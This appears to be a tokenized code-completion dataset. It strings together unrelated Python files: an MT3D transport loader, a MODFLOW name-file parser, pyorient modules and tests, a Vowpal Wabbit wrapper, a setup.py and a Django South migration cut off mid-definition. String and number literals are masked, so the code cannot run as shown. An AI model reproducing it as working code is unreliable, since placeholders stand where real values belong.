<EOL> if '<STR_LIT>' in ll [ <NUM_LIT:0> ] . lower ( ) : <EOL> sf = '<STR_LIT>' <EOL> ssflag . append ( sf ) <EOL> if tsmult [ - <NUM_LIT:1> ] < <NUM_LIT:0> : <EOL> t = np . empty ( ( nstp [ - <NUM_LIT:1> ] ) , dtype = np . float32 ) <EOL> read1d ( f , t ) <EOL> tslngh . append ( t ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> line = f . readline ( ) <EOL> dt0 . append ( float ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) ) <EOL> mxstrn . append ( int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) ) <EOL> ttsmult . append ( float ( line [ <NUM_LIT:20> : <NUM_LIT:30> ] ) ) <EOL> ttsmax . append ( float ( line [ <NUM_LIT:30> : <NUM_LIT> ] ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( perlen ) ) <EOL> print ( '<STR_LIT>' . format ( nstp ) ) <EOL> print ( '<STR_LIT>' . format ( tsmult ) ) <EOL> print ( '<STR_LIT>' . format ( ssflag ) ) <EOL> print ( '<STR_LIT>' . format ( tslngh ) ) <EOL> print ( '<STR_LIT>' . format ( dt0 ) ) <EOL> print ( '<STR_LIT>' . format ( mxstrn ) ) <EOL> print ( '<STR_LIT>' . format ( ttsmult ) ) <EOL> print ( '<STR_LIT>' . format ( ttsmax ) ) <EOL> f . close ( ) <EOL> btn = Mt3dBtn ( model , nlay = nlay , nrow = nrow , ncol = ncol , nper = nper , <EOL> ncomp = ncomp , mcomp = mcomp , tunit = tunit , <EOL> laycon = laycon , delr = delr , delc = delc , htop = htop , dz = dz , <EOL> lunit = lunit , munit = munit , prsity = prsity , icbund = icbund , <EOL> sconc = sconc , cinact = cinact , thkmin = thkmin , <EOL> ifmtcn = ifmtcn , ifmtnp = ifmtnp , ifmtrf = ifmtrf , <EOL> ifmtdp = ifmtdp , savucn = savucn , nprs = nprs , <EOL> timprs = timprs , obs = obs , nprobs = nprobs , chkmas = chkmas , <EOL> nprmas = nprmas , perlen = perlen , nstp = nstp , tsmult = tsmult , <EOL> ssflag = ssflag , dt0 = dt0 , mxstrn = mxstrn , ttsmult = ttsmult , <EOL> ttsmax = ttsmax , ** kwargs ) <EOL> return btn </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> class NamData ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pkgtype , name , handle , packages ) : <EOL> self . filehandle = handle <EOL> self . filename = name <EOL> self . filetype = pkgtype <EOL> self . package = None <EOL> if self . filetype . lower ( ) in packages : <EOL> self . package = packages [ self . filetype . lower ( ) ] <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . filename , self . filetype ) <EOL> def getfiletypeunit ( nf , filetype ) : <EOL> """<STR_LIT>""" <EOL> for cunit , cvals in nf . items ( ) : <EOL> if cvals . filetype . lower ( ) == filetype . lower ( ) : <EOL> return cunit <EOL> print ( '<STR_LIT>' . format ( filetype ) ) <EOL> return None <EOL> def testint ( cval ) : <EOL> try : <EOL> int ( cval ) <EOL> return True <EOL> except : <EOL> return False <EOL> def parsenamefile ( namfilename , packages , verbose = True ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isfile ( namfilename ) : <EOL> if namfilename [ - <NUM_LIT:4> : ] . lower ( ) != '<STR_LIT>' : <EOL> namfilename += '<STR_LIT>' <EOL> ext_unit_dict = dict ( ) <EOL> if verbose : <EOL> print ( '<STR_LIT>' . format ( namfilename ) ) <EOL> print ( '<STR_LIT>' ) <EOL> if not os . path . isfile ( namfilename ) : <EOL> dn = os . path . dirname ( namfilename ) <EOL> s = '<STR_LIT>' . format ( namfilename , dn , os . listdir ( dn ) ) <EOL> raise Exception ( s ) <EOL> indata = open ( namfilename , '<STR_LIT:r>' ) . readlines ( ) <EOL> for line in indata : <EOL> tmp = line . strip ( ) . split ( ) <EOL> if len ( tmp ) == <NUM_LIT:0> : <EOL> continue <EOL> if '<STR_LIT:#>' not in tmp [ <NUM_LIT:0> ] : <EOL> if testint ( tmp [ <NUM_LIT:1> ] ) : <EOL> fname = os . path . join ( os . path . dirname ( namfilename ) , tmp [ <NUM_LIT:2> ] ) <EOL> if not os . path . isfile ( fname ) : <EOL> dn = os . path . dirname ( fname ) <EOL> fls = os . listdir ( dn ) <EOL> lownams = [ f . lower ( ) for f in fls ] <EOL> bname = os . path . basename ( fname ) <EOL> if bname . lower ( ) in lownams : <EOL> idx = lownams . index ( bname . lower ( ) ) <EOL> fname = os . path . join ( dn , fls [ idx ] ) <EOL> openmode = '<STR_LIT:r>' <EOL> if tmp [ <NUM_LIT:0> ] . upper ( ) == '<STR_LIT>' : <EOL> openmode = '<STR_LIT:rb>' <EOL> try : <EOL> filehandle = open ( fname , openmode ) <EOL> except : <EOL> if verbose : <EOL> print ( '<STR_LIT>' . format ( tmp [ <NUM_LIT:2> ] ) ) <EOL> filehandle = None <EOL> key = int ( tmp [ <NUM_LIT:1> ] ) <EOL> if key == <NUM_LIT:0> : <EOL> ftype = tmp [ <NUM_LIT:0> ] . lower ( ) <EOL> if ftype in packages : <EOL> key = packages [ ftype ] . unitnumber <EOL> else : <EOL> key = tmp [ <NUM_LIT:0> ] <EOL> ext_unit_dict [ key ] = NamData ( tmp [ <NUM_LIT:0> ] . upper ( ) , fname , filehandle , <EOL> packages ) <EOL> return ext_unit_dict </s>
<s> from . vertex import Vertex <EOL> from . edge import Edge <EOL> from . property import Property <EOL> from collections import OrderedDict <EOL> class DeclarativeMeta ( type ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( cls , class_name , bases , attrs ) : <EOL> if not hasattr ( cls , '<STR_LIT>' ) : <EOL> cls . registry = OrderedDict ( ) <EOL> cls . decl_root = cls <EOL> else : <EOL> decl_bases = set ( <EOL> base . decl_root for base in bases <EOL> if hasattr ( base , '<STR_LIT>' ) and base is not base . decl_root ) <EOL> if len ( decl_bases ) > <NUM_LIT:1> : <EOL> raise TypeError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if cls . decl_type is DeclarativeType . Vertex : <EOL> cls . registry_name = attrs . get ( '<STR_LIT>' <EOL> , cls . __name__ . lower ( ) ) <EOL> plural = attrs . get ( '<STR_LIT>' ) <EOL> if plural : <EOL> cls . registry_plural = plural <EOL> else : <EOL> label = attrs . get ( '<STR_LIT:label>' ) <EOL> if label : <EOL> cls . registry_name = cls . registry_plural = label <EOL> else : <EOL> cls . registry_name = cls . __name__ . lower ( ) <EOL> for prop in cls . __dict__ . values ( ) : <EOL> if not isinstance ( prop , Property ) : <EOL> continue <EOL> prop . _context = cls <EOL> cls . registry [ cls . registry_name ] = cls <EOL> return super ( DeclarativeMeta , cls ) . __init__ ( class_name , bases , attrs ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if isinstance ( value , Property ) : <EOL> if value . context : <EOL> raise ValueError ( <EOL> '<STR_LIT>' ) <EOL> value . context = self <EOL> return super ( DeclarativeMeta , self ) . __setattr__ ( name , value ) <EOL> def __format__ ( self , format_spec ) : <EOL> """<STR_LIT>""" <EOL> return repr ( self . registry_name ) <EOL> class DeclarativeType ( object ) : <EOL> """<STR_LIT>""" <EOL> Vertex = <NUM_LIT:0> <EOL> Edge = <NUM_LIT:1> <EOL> def declarative_base ( decl_type , name , cls , metaclass , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> bases = cls if isinstance ( cls , tuple ) else ( cls , ) <EOL> class_dict = dict ( decl_type = decl_type ) <EOL> class_dict . update ( kwargs ) <EOL> return metaclass ( name , bases , class_dict ) <EOL> def declarative_node ( name = '<STR_LIT>' , cls = Vertex , metaclass = DeclarativeMeta <EOL> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return declarative_base ( DeclarativeType . Vertex , name , cls , metaclass <EOL> , ** kwargs ) <EOL> def declarative_relationship ( name = '<STR_LIT>' , cls = Edge <EOL> , metaclass = DeclarativeMeta <EOL> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return declarative_base ( DeclarativeType . Edge , name , cls , metaclass <EOL> , ** kwargs ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import sys <EOL> import os <EOL> import unittest <EOL> from pyorient . exceptions import * <EOL> from pyorient import OrientSocket <EOL> from pyorient . messages . connection import * <EOL> from pyorient . messages . database import * <EOL> from pyorient . messages . commands import * <EOL> from pyorient . messages . records import * <EOL> from pyorient . constants import * <EOL> os . environ [ '<STR_LIT>' ] = "<STR_LIT:1>" <EOL> os . environ [ '<STR_LIT>' ] = "<STR_LIT:0>" <EOL> if os . path . realpath ( '<STR_LIT>' ) not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . realpath ( '<STR_LIT>' ) ) <EOL> if os . path . realpath ( '<STR_LIT:.>' ) not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . realpath ( '<STR_LIT:.>' ) ) <EOL> class RawMessages_5_TestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_attach_class_hint ( self ) : <EOL> try : <EOL> connection = OrientSocket ( "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> tx = TxCommitMessage ( connection ) <EOL> tx . begin ( ) <EOL> tx . attach ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> assert False <EOL> except AssertionError as e : <EOL> assert '<STR_LIT>' == str ( e ) <EOL> assert True <EOL> def test_private_prepare ( self ) : <EOL> try : <EOL> connection = OrientSocket ( "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> DbOpenMessage ( connection ) . prepare ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , DB_TYPE_DOCUMENT , "<STR_LIT>" ) <EOL> ) . send ( ) . fetch_response ( ) <EOL> tx = TxCommitMessage ( connection ) <EOL> tx . begin ( ) <EOL> tx . prepare ( ) <EOL> assert False <EOL> except AttributeError as e : <EOL> print ( str ( e ) ) <EOL> assert True <EOL> def test_private_send ( self ) : <EOL> try : <EOL> connection = OrientSocket ( "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> DbOpenMessage ( connection ) . prepare ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , DB_TYPE_DOCUMENT , "<STR_LIT>" ) <EOL> ) . send ( ) . fetch_response ( ) <EOL> tx = TxCommitMessage ( connection ) <EOL> tx . begin ( ) <EOL> tx . send ( ) <EOL> assert False <EOL> except AttributeError as e : <EOL> print ( str ( e ) ) <EOL> assert True <EOL> def test_private_fetch ( self ) : <EOL> try : <EOL> connection = OrientSocket ( "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> DbOpenMessage ( connection ) . prepare ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , DB_TYPE_DOCUMENT , "<STR_LIT>" ) <EOL> ) . send ( ) . fetch_response ( ) <EOL> tx = TxCommitMessage ( connection ) <EOL> tx . begin ( ) <EOL> tx . fetch_response ( ) <EOL> assert False <EOL> except AttributeError as e : <EOL> print ( str ( e ) ) <EOL> assert True <EOL> def test_transaction ( self ) : <EOL> connection = OrientSocket ( "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> session_id = ( ConnectMessage ( connection ) ) . prepare ( ( "<STR_LIT:root>" , "<STR_LIT:root>" ) ) . send ( ) . fetch_response ( ) <EOL> db_name = "<STR_LIT>" <EOL> msg = DbExistsMessage ( connection ) <EOL> exists = msg . prepare ( [ db_name ] ) . send ( ) . fetch_response ( ) <EOL> print ( "<STR_LIT>" % exists ) <EOL> try : <EOL> ( DbDropMessage ( connection ) ) . prepare ( [ db_name ] ) . send ( ) . fetch_response ( ) <EOL> assert True <EOL> except PyOrientCommandException as e : <EOL> print ( str ( e ) ) <EOL> finally : <EOL> ( DbCreateMessage ( connection ) ) . prepare ( <EOL> ( db_name , DB_TYPE_GRAPH , STORAGE_TYPE_PLOCAL ) <EOL> ) . send ( ) . fetch_response ( ) <EOL> msg = DbOpenMessage ( connection ) <EOL> cluster_info = msg . prepare ( <EOL> ( db_name , "<STR_LIT>" , "<STR_LIT>" , DB_TYPE_GRAPH , "<STR_LIT>" ) <EOL> ) . send ( ) . fetch_response ( ) <EOL> try : <EOL> create_class = CommandMessage ( connection ) <EOL> create_class . prepare ( ( QUERY_CMD , "<STR_LIT>" ) ) . send ( ) . fetch_response ( ) <EOL> except PyOrientCommandException as e : <EOL> pass <EOL> rec0 = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> real_record1 = ( RecordCreateMessage ( connection ) ) . prepare ( ( <NUM_LIT:3> , rec0 ) ) . send ( ) . fetch_response ( ) <EOL> rec3 = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> temp_update_real_rec = ( RecordUpdateMessage ( connection ) ) . prepare ( ( <NUM_LIT:3> , real_record1 . _rid , rec3 , real_record1 . _version ) ) <EOL> rec1 = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> temp_record1 = ( RecordCreateMessage ( connection ) ) . prepare ( ( - <NUM_LIT:1> , rec1 ) ) <EOL> rec2 = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> temp_record2 = ( RecordCreateMessage ( connection ) ) . prepare ( ( - <NUM_LIT:1> , rec2 ) ) <EOL> delete_real_rec = RecordDeleteMessage ( connection ) <EOL> delete_real_rec . prepare ( ( <NUM_LIT:3> , real_record1 . _rid ) ) <EOL> rec = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> real_record1 = ( RecordCreateMessage ( connection ) ) . prepare ( ( <NUM_LIT:3> , rec ) ) . send ( ) . fetch_response ( ) <EOL> tx = TxCommitMessage ( connection ) <EOL> tx . begin ( ) <EOL> tx . attach ( temp_record1 ) <EOL> tx . attach ( temp_record2 ) <EOL> tx . attach ( temp_update_real_rec ) <EOL> tx . attach ( delete_real_rec ) <EOL> res = tx . commit ( ) <EOL> for k , v in res . items ( ) : <EOL> print ( k + "<STR_LIT>" + v . vacanza ) <EOL> assert len ( res ) == <NUM_LIT:2> <EOL> assert res [ "<STR_LIT>" ] . vacanza == '<STR_LIT>' <EOL> assert res [ "<STR_LIT>" ] . vacanza == '<STR_LIT>' <EOL> sid = ( ConnectMessage ( connection ) ) . prepare ( ( "<STR_LIT:root>" , "<STR_LIT:root>" ) ) . send ( ) . fetch_response ( ) <EOL> ( DbDropMessage ( connection ) ) . prepare ( [ db_name , STORAGE_TYPE_MEMORY ] ) . send ( ) . fetch_response ( ) </s>
<s> from __future__ import print_function , division , absolute_import , unicode_literals <EOL> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __email__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> try : <EOL> basestring <EOL> except : <EOL> basestring = str <EOL> import logging <EOL> import re <EOL> import pexpect <EOL> from . import active_learner <EOL> class WabbitInvalidCharacter ( ValueError ) : <EOL> pass <EOL> validation_regex = re . compile ( r'<STR_LIT>' ) <EOL> def validate_vw_string ( s ) : <EOL> """<STR_LIT>""" <EOL> if validation_regex . search ( s ) : <EOL> raise WabbitInvalidCharacter ( s ) <EOL> escape_dict = { '<STR_LIT:U+0020>' : r'<STR_LIT>' , <EOL> '<STR_LIT::>' : r'<STR_LIT>' , <EOL> '<STR_LIT:|>' : r'<STR_LIT:\\>' <EOL> } <EOL> def escape_vw_character ( special_character_re_match ) : <EOL> special_character = special_character_re_match . group ( ) <EOL> return escape_dict [ special_character ] <EOL> def escape_vw_string ( s ) : <EOL> escaped_s = validation_regex . sub ( escape_vw_character , s ) <EOL> return escaped_s <EOL> class Namespace ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> name = None , <EOL> scale = None , <EOL> features = None , <EOL> escape = True , <EOL> validate = True , <EOL> cache_string = False ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . scale = scale <EOL> self . validate = validate <EOL> self . escape = escape <EOL> self . _string = None <EOL> self . features = [ ] <EOL> self . cache_string = cache_string <EOL> if name : <EOL> if escape : <EOL> self . name = escape_vw_string ( self . name ) <EOL> elif validate : <EOL> validate_vw_string ( self . name ) <EOL> if features : <EOL> self . add_features ( features ) <EOL> def add_features ( self , features ) : <EOL> """<STR_LIT>""" <EOL> for feature in features : <EOL> if isinstance ( feature , basestring ) : <EOL> label = feature <EOL> value = None <EOL> else : <EOL> label , value = feature <EOL> self . add_feature ( label , value ) <EOL> def add_feature ( self , label , value = None ) : <EOL> """<STR_LIT>""" <EOL> if self . escape : <EOL> label = escape_vw_string ( label ) <EOL> elif self . validate : <EOL> validate_vw_string ( label ) <EOL> feature = ( label , value ) <EOL> self . features . append ( feature ) <EOL> def to_string ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _string is None : <EOL> tokens = [ ] <EOL> if self . name : <EOL> if self . scale : <EOL> token = self . name + '<STR_LIT::>' + str ( self . scale ) <EOL> else : <EOL> token = self . name <EOL> else : <EOL> token = '<STR_LIT>' <EOL> tokens . append ( token ) <EOL> for label , value in self . features : <EOL> if value is None : <EOL> token = label <EOL> else : <EOL> token = label + '<STR_LIT::>' + str ( value ) <EOL> tokens . append ( token ) <EOL> tokens . append ( '<STR_LIT>' ) <EOL> output = '<STR_LIT:U+0020>' . join ( tokens ) <EOL> if self . cache_string : <EOL> self . _string = output <EOL> else : <EOL> output = self . _string <EOL> return output <EOL> def export_features ( self , delimiter = '<STR_LIT:\\>' ) : <EOL> """<STR_LIT>""" <EOL> result_list = [ ] <EOL> for feature in self . features : <EOL> result = '<STR_LIT>' . format ( self . name , delimiter , feature ) <EOL> result_list . append ( result ) <EOL> return result_list <EOL> class VWResult ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , result_string , active_mode = False ) : <EOL> """<STR_LIT>""" <EOL> self . raw_output = result_string <EOL> result_list = [ ] <EOL> for token in result_string . split ( ) : <EOL> try : <EOL> result = float ( token ) <EOL> result_list . append ( result ) <EOL> except ValueError : <EOL> logging . debug ( "<STR_LIT>" . format ( token ) ) <EOL> self . value_list = result_list <EOL> if result_list : <EOL> self . prediction = result_list [ <NUM_LIT:0> ] <EOL> else : <EOL> self . prediction = None <EOL> if active_mode : <EOL> if len ( result_list ) > <NUM_LIT:1> : <EOL> self . importance = result_list [ <NUM_LIT:1> ] <EOL> else : <EOL> self . importance = <NUM_LIT:0.> <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> class VW ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , command = None , active_mode = False , dummy_mode = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if command is None : <EOL> if active_mode : <EOL> active_settings = active_learner . get_active_default_settings ( ) <EOL> active_settings . update ( kwargs ) <EOL> kwargs = active_settings <EOL> port = kwargs . get ( '<STR_LIT:port>' ) <EOL> command = make_command_line ( ** kwargs ) <EOL> self . active_mode = active_mode <EOL> self . dummy_mode = dummy_mode <EOL> if dummy_mode : <EOL> self . vw_process = None <EOL> else : <EOL> if active_mode : <EOL> self . vw_process = active_learner . ActiveVWProcess ( command , port = port ) <EOL> else : <EOL> self . vw_process = pexpect . spawn ( command ) <EOL> self . vw_process . delaybeforesend = <NUM_LIT:0> <EOL> self . vw_process . setecho ( False ) <EOL> logging . info ( "<STR_LIT>" . format ( command ) ) <EOL> self . command = command <EOL> self . namespaces = [ ] <EOL> self . _line = None <EOL> def send_line ( self , line , parse_result = True ) : <EOL> """<STR_LIT>""" <EOL> self . vw_process . sendline ( line ) <EOL> result = self . _get_response ( parse_result = parse_result ) <EOL> return result <EOL> def _get_response ( self , parse_result = True ) : <EOL> """<STR_LIT>""" <EOL> self . vw_process . expect_exact ( '<STR_LIT:\r\n>' , searchwindowsize = - <NUM_LIT:1> ) <EOL> if parse_result : <EOL> output = self . vw_process . before <EOL> result_struct = VWResult ( output , active_mode = self . active_mode ) <EOL> else : <EOL> result_struct = None <EOL> return result_struct <EOL> def send_example ( self , <EOL> * args , <EOL> ** kwargs <EOL> ) : <EOL> """<STR_LIT>""" <EOL> parse_result = kwargs . pop ( '<STR_LIT>' , True ) <EOL> line = self . make_line ( * args , ** kwargs ) <EOL> result = self . send_line ( line , parse_result = parse_result ) <EOL> return result <EOL> def make_line ( self , <EOL> response = None , <EOL> importance = None , <EOL> base = None , <EOL> tag = None , <EOL> features = None , <EOL> namespaces = None , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> if namespaces is not None : <EOL> self . add_namespaces ( namespaces ) <EOL> if features is not None : <EOL> namespace = Namespace ( features = features ) <EOL> self . add_namespace ( namespace ) <EOL> substrings = [ ] <EOL> tokens = [ ] <EOL> if response is not None : <EOL> token = str ( response ) <EOL> tokens . append ( token ) <EOL> if importance is not None : <EOL> token = str ( importance ) <EOL> tokens . append ( token ) <EOL> if base is not None : <EOL> token = str ( base ) <EOL> tokens . append ( token ) <EOL> if tag is not None : <EOL> token = "<STR_LIT:'>" + str ( tag ) <EOL> tokens . append ( token ) <EOL> else : <EOL> token = "<STR_LIT>" <EOL> tokens . append ( token ) <EOL> substring = '<STR_LIT:U+0020>' . join ( tokens ) <EOL> substrings . append ( substring ) <EOL> if self . namespaces : <EOL> for namespace in self . namespaces : <EOL> substring = namespace . to_string ( ) <EOL> substrings . append ( substring ) <EOL> else : <EOL> substrings . append ( '<STR_LIT>' ) <EOL> line = '<STR_LIT:|>' . join ( substrings ) <EOL> self . _line = line <EOL> self . namespaces = [ ] <EOL> return line <EOL> def add_namespace ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if args and isinstance ( args [ <NUM_LIT:0> ] , Namespace ) : <EOL> namespace = args [ <NUM_LIT:0> ] <EOL> elif isinstance ( kwargs . get ( '<STR_LIT>' ) , Namespace ) : <EOL> namespace = kwargs . get ( '<STR_LIT>' ) <EOL> else : <EOL> namespace = Namespace ( * args , ** kwargs ) <EOL> self . namespaces . append ( namespace ) <EOL> return self <EOL> def add_namespaces ( self , namespaces ) : <EOL> """<STR_LIT>""" <EOL> for namespace in namespaces : <EOL> self . add_namespace ( namespace ) <EOL> return self <EOL> def get_prediction ( self , features = None , tag = None , namespaces = None ) : <EOL> """<STR_LIT>""" <EOL> if features is not None : <EOL> namespace = Namespace ( features = features ) <EOL> self . add_namespace ( namespace ) <EOL> result = self . send_example ( tag = tag , namespaces = namespaces ) <EOL> return result <EOL> def save_model ( self , model_filename ) : <EOL> """<STR_LIT>""" <EOL> line = "<STR_LIT>" . format ( model_filename ) <EOL> self . vw_process . sendline ( line ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> self . vw_process . close ( ) <EOL> def make_command_line ( predictions = '<STR_LIT>' , <EOL> quiet = True , <EOL> save_resume = True , <EOL> q_colon = None , <EOL> ** kwargs <EOL> ) : <EOL> """<STR_LIT>""" <EOL> args = [ '<STR_LIT>' ] <EOL> if q_colon : <EOL> kwargs [ '<STR_LIT>' ] = q_colon <EOL> kwargs [ '<STR_LIT>' ] = predictions <EOL> kwargs [ '<STR_LIT>' ] = quiet <EOL> kwargs [ '<STR_LIT>' ] = save_resume <EOL> for key , value in kwargs . items ( ) : <EOL> if len ( key ) == <NUM_LIT:1> : <EOL> option = '<STR_LIT>' . format ( key ) <EOL> else : <EOL> option = '<STR_LIT>' . format ( key ) <EOL> if value is True : <EOL> arg_list = [ option ] <EOL> elif isinstance ( value , basestring ) : <EOL> arg_list = [ '<STR_LIT>' . format ( option , value ) ] <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> arg_list = [ '<STR_LIT>' . format ( option , subvalue ) for subvalue in value ] <EOL> else : <EOL> arg_list = [ '<STR_LIT>' . format ( option , value ) ] <EOL> args . extend ( arg_list ) <EOL> command = '<STR_LIT:U+0020>' . join ( args ) <EOL> return command </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> """<STR_LIT>""" </s>
<s> from molly . conf . provider import Provider <EOL> class BaseFeedsProvider ( Provider ) : <EOL> pass <EOL> from rss import RSSFeedsProvider <EOL> from ical import ICalFeedsProvider <EOL> from talks_cam import TalksCamFeedsProvider </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT:title>' ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT:title>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , blank = True ) , keep_default = False ) <EOL> for eg in orm . EntityGroup . objects . all ( ) : <EOL> eg . title = name_in_category ( eg , '<STR_LIT:title>' ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT:title>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , blank = True ) , keep_default = False ) <EOL> for e in orm . Entity . objects . all ( ) : <EOL> e . title = name_in_category ( eg , '<STR_LIT:title>' ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , blank = True ) , keep_default = False ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , blank = True , max_length = <NUM_LIT:2> ) , keep_default = False ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , blank = True ) , keep_default = False ) <EOL> for e in orm . Entity . objects . all ( ) : <EOL> e . article = name_in_category ( eg , '<STR_LIT>' ) . split ( ) [ <NUM_LIT:0> ] <EOL> e . verbose_name = name_in_category ( eg , '<STR_LIT>' ) <EOL> e . verbose_name_plural = name_in_category ( eg , '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] 